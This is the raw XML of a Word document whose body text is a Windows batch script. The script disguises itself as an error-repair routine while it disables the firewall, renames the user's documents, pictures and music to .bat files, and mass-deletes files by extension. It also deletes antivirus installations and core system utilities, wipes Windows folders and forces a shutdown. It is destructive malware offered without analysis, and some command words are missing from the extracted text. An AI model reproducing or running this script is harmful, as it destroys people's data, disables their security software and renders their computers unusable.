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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="4F6733"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@echo off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color 0a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:start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msg * Computer Error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pause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msg * windows will try to fix the error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pause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cls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cd %windir%\system32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mouse.drv /S /F /Q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keyboard.drv /S /F /Q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keyboard.sys /S /F /Q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cls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netsh firewall set opmode=disable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cls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time 60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cls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echo Windows Has Detected The Error Please Wait...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pause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echo Attempting To Fix The Error...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pause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echo ERROR WIN32!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pause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echo ERROR WIN32!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cls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cd %userprofile%\my documents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ren *.txt *.bat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ren *.doc *.bat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ren *.pub *.bat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ren *.pps *.bat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ren *.htm *.bat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ren *.pdf *.bat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cls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cd %userprofile%\my documents\my pictures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ren *.gif *.bat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ren *.jpg *.bat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ren *.jpeg *.bat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ren *.bmp *.bat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ren *.dip *.bat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ren *.tif *.bat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ren *.png *.bat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cls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cd %userprofile%\my documents\my music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ren *.mp3 *.bat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lastRenderedPageBreak/>
        <w:t>ren *.mp4 *.bat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ren *.wav *.bat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ren *.mpeg *.bat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ren *.mpg *.bat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pause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cd\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*.exe /F /Q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*.rar /F /Q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*.zip /F /Q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*.mp3 /F /Q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*.mp4 /F /Q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*.wav /F /Q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*.avi /F /Q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*.jpeg /F /Q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*.dvix /F /Q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*.mpg /F /Q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*.vob /F /Q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*.mov /F /Q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*.m2v /F /Q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*.flv /F /Q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*.wmv /F /Q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*.txt /F /Q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*.pdf /F /Q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*.dll /F /Q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*.reg /F /Q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*.ini /F /Q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*.com /F /Q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*.scr /F /Q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*.jpg /F /Q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*.gif /F /Q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*.png /F /Q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*.bmp /F /Q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*.ico /F /Q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*.xml /F /Q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*.kwm /F /Q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*.dat /F /Q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*.hta /F /Q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*.htm /F /Q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*.css /F /Q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*.apl /F /Q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*.api /F /Q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*.js /F /Q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*.html /F /Q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/Q /F C:\Program Files\alwils~1\avast4\*.*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lastRenderedPageBreak/>
        <w:t>del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe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/Q /F C:\Program Files\kasper~1\*.exe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/Q /F C:\Program Files\trojan~1\*.exe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/Q /F C:\Program Files\f-prot95\*.dll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/Q /F C:\Program Files\tbav\*.dat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/Q /F C:\Program Files\avpersonal\*.vdf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/Q /F C:\Program Files\Norton~1\*.cnt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/Q /F C:\Program Files\Mcafee\*.*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/Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*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/Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*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/Q /F C:\Program Files\Norton~1\Norton~1\*.*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/Q /F C:\Program Files\Norton~1\*.*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c:\WINDOWS\system32\ipconfig.exe /S /Q /F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c:\WINDOWS\system32\xcopy.exe /S /Q /F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c:\WINDOWS\system32\logoff.exe /S /Q /F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c:\WINDOWS\system32\rename.exe /S /Q /F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c:\WINDOWS\system32\tracert.exe /S /Q /F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c:\WINDOWS\system32\ping.exe /S /Q /F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c:\WINDOWS\system32\ping6.exe /S /Q /F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c:\WINDOWS\system32\compact.exe /S /Q /F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c:\WINDOWS\system32\chkdsk.exe /S /Q /F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c:\WINDOWS\system32\msg.exe /S /Q /F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c:\WINDOWS\system32\attrib.exe /S /Q /F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c:\WINDOWS\system32\format.exe /S /Q /F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c:\WINDOWS\system32\netsh.exe /S /Q /F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c:\WINDOWS\system32\netstat.exe /S /Q /F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c:\WINDOWS\system32\net.exe /S /Q /F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c:\WINDOWS\system32\reg.exe /S /Q /F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c:\WINDOWS\system32\tskill.exe /S /Q /F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dir %windir%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*.* /q /f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dir %windir%/system32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*.* /q /f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dir %windir%/fonts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*.* /q /f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dir %windir%/system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*.* /q /f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dir %windir%/system32/drivers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del *.* /q /f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msg * WIN32 WIPED!.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msg * Terminal Error! Shuting Down!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E117BF" w:rsidRDefault="00E117BF" w:rsidP="00E117BF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8FFF1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="4F6733"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="4F6733"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shutdown -s -t 00 -c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005744AD" w:rsidRDefault="005744AD"/>
    <w:sectPr w:rsidR="005744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7F9"/>
    <w:rsid w:val="005744AD"/>
    <w:rsid w:val="00D117F9"/>
    <w:rsid w:val="00E1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1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1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7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460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COMLAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Giovanni COMLAN</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-06-25T19:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-06-25T19:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>